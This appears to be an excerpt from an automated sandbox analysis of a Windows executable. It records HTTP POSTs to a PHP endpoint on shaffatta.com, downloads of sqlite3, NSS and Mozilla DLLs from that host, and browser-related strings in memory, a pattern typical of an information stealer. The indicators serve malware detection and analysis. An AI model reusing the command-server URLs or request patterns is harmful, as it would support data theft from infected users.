Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJJKKJJDAAAAAKFHJJDGHost: shaffatta.comContent-Length: 363Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJEBKECBAKFBGDGCBGDHost: shaffatta.comContent-Length: 270Connection: Keep-AliveCache-Control: no-cache
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: HETZNER-ASDE HETZNER-ASDE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Wb9LZ5Sn1l.exe Code function: 0_2_00404C70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 0_2_00404C70
Source: global traffic HTTP traffic detected: GET /d32e011d2eaa85a0/sqlite3.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /d32e011d2eaa85a0/freebl3.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /d32e011d2eaa85a0/mozglue.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /d32e011d2eaa85a0/msvcp140.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /d32e011d2eaa85a0/nss3.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /d32e011d2eaa85a0/softokn3.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /d32e011d2eaa85a0/vcruntime140.dll HTTP/1.1Host: shaffatta.comCache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: shaffatta.com
Source: unknown HTTP traffic detected: POST /fdca69ae739b4897.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIEHIIIJDAAAAAAKECBHost: shaffatta.comContent-Length: 215Connection: Keep-AliveCache-Control: no-cache
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: Amcache.hve.6.dr String found in binary or memory: http://upx.sf.net
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: Wb9LZ5Sn1l.exe, Wb9LZ5Sn1l.exe, 00000000.00000002.3137541385.000000006CCDD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3125972601.000000001D4D4000.00000004.00000020.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000002.3137426070.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: Wb9LZ5Sn1l.exe, 00000000.00000003.2384835774.000000001D3F0000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Wb9LZ5Sn1l.exe, 00000000.00000003.2384835774.000000001D3F0000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Wb9LZ5Sn1l.exe, 00000000.00000003.2384835774.000000001D3F0000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Wb9LZ5Sn1l.exe, 00000000.00000003.2384835774.000000001D3F0000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Wb9LZ5Sn1l.exe, 00000000.00000003.2384835774.000000001D3F0000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Wb9LZ5Sn1l.exe, 00000000.00000003.2384835774.000000001D3F0000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Wb9LZ5Sn1l.exe, 00000000.00000003.2384835774.000000001D3F0000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3114054279.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com
Source: Wb9LZ5Sn1l.exe, 00000000.00000003.2384626104.0000000002C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3125781608.000000001D49F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/#f
Source: Wb9LZ5Sn1l.exe, 00000000.00000003.2375217117.0000000002C44000.00000004.00000020.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000003.2363931661.0000000002C44000.00000004.00000020.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000003.2384626104.0000000002C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com//
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3125781608.000000001D49F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/32e011d2eaa85a0/nss3.dllufE
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3125781608.000000001D49F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/AECFCAAEBFHIEHDGHDHCBA9fy
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3125781608.000000001D49F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/AECFCAAEBFHIEHDGHDHCBAxf6
Source: Wb9LZ5Sn1l.exe, 00000000.00000003.2375217117.0000000002C44000.00000004.00000020.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000003.2363931661.0000000002C44000.00000004.00000020.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000003.2384626104.0000000002C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/D
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3125781608.000000001D49F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/Kf
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3114165780.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000002.3125781608.000000001D428000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/freebl3.dll
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3114165780.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/mozglue.dll
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3114165780.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/mozglue.dllb
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3114165780.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/msvcp140.dll
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3114165780.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/msvcp140.dllF
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3114165780.0000000002BF4000.00000004.00000020.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000002.3125781608.000000001D49F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/nss3.dll
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3125781608.000000001D49F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/nss3.dllDg2
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3114165780.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/softokn3.dll
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3114165780.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/softokn3.dllt
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3114165780.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000003.2363931661.0000000002C44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/sqlite3.dll
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3114165780.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/sqlite3.dllf?6
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3114165780.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000002.3125781608.000000001D49F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/vcruntime140.dll
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3125781608.000000001D49F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/d32e011d2eaa85a0/vcruntime140.dlljd
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3125781608.000000001D49F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/fatta.com/
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3125781608.000000001D49F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/fatta.com/32e011d2eaa85a0/nss3.dll
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3125781608.000000001D49F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/fatta.com/32e011d2eaa85a0/nss3.dllbfP
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3125781608.000000001D49F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/fatta.com/d32e011d2eaa85a0/nss3.dll
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3125781608.000000001D49F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/fatta.com/ia
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3125781608.000000001D49F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/fatta.com/uments
Source: Wb9LZ5Sn1l.exe, 00000000.00000003.2375217117.0000000002C44000.00000004.00000020.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000003.2363931661.0000000002C44000.00000004.00000020.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000003.2384626104.0000000002C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/fdca69ae739b4897.php
Source: Wb9LZ5Sn1l.exe, 00000000.00000003.2375217117.0000000002C44000.00000004.00000020.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000003.2363931661.0000000002C44000.00000004.00000020.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000003.2384626104.0000000002C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/fdca69ae739b4897.php&
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3114165780.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/fdca69ae739b4897.php)
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3125781608.000000001D49F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/fdca69ae739b4897.php4n
Source: Wb9LZ5Sn1l.exe, 00000000.00000003.2375217117.0000000002C44000.00000004.00000020.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000003.2384626104.0000000002C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phpV
Source: Wb9LZ5Sn1l.exe, 00000000.00000003.2375217117.0000000002C44000.00000004.00000020.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000003.2384626104.0000000002C41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phpX
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3112781887.0000000000549000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phpdf75cd1f19e4e3ce5d0897b354e44
Source: Wb9LZ5Sn1l.exe, 00000000.00000003.2375217117.0000000002C44000.00000004.00000020.00020000.00000000.sdmp, Wb9LZ5Sn1l.exe, 00000000.00000003.2363931661.0000000002C44000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phpe
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3114165780.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phpft
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3114165780.0000000002C2A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phpindows
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3114165780.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phpl-
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3114165780.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phpm
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3114165780.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/fdca69ae739b4897.phpu-
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3125781608.000000001D49F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/ia
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3125781608.000000001D49F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/ost:
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3114165780.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/qC
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3125781608.000000001D49F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com/uments
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3114054279.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://shaffatta.com0
Source: DAECAECFCAAEBFHIEHDGHDHCBA.0.dr String found in binary or memory: https://support.mozilla.org
Source: DAECAECFCAAEBFHIEHDGHDHCBA.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: DAECAECFCAAEBFHIEHDGHDHCBA.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: Wb9LZ5Sn1l.exe, 00000000.00000003.2384835774.000000001D3F0000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: Wb9LZ5Sn1l.exe, 00000000.00000003.2384835774.000000001D3F0000.00000004.00000020.00020000.00000000.sdmp, IDAAFBGD.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: DAECAECFCAAEBFHIEHDGHDHCBA.0.dr String found in binary or memory: https://www.mozilla.org
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3112781887.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: DAECAECFCAAEBFHIEHDGHDHCBA.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3112781887.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: DAECAECFCAAEBFHIEHDGHDHCBA.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: Wb9LZ5Sn1l.exe, 00000000.00000003.2556192247.000000002F975000.00000004.00000020.00020000.00000000.sdmp, DAECAECFCAAEBFHIEHDGHDHCBA.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: DAECAECFCAAEBFHIEHDGHDHCBA.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Wb9LZ5Sn1l.exe, 00000000.00000003.2556192247.000000002F975000.00000004.00000020.00020000.00000000.sdmp, DAECAECFCAAEBFHIEHDGHDHCBA.0.dr String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3112781887.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: Wb9LZ5Sn1l.exe, 00000000.00000003.2556192247.000000002F975000.00000004.00000020.00020000.00000000.sdmp, DAECAECFCAAEBFHIEHDGHDHCBA.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: Wb9LZ5Sn1l.exe, 00000000.00000002.3112781887.0000000000447000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
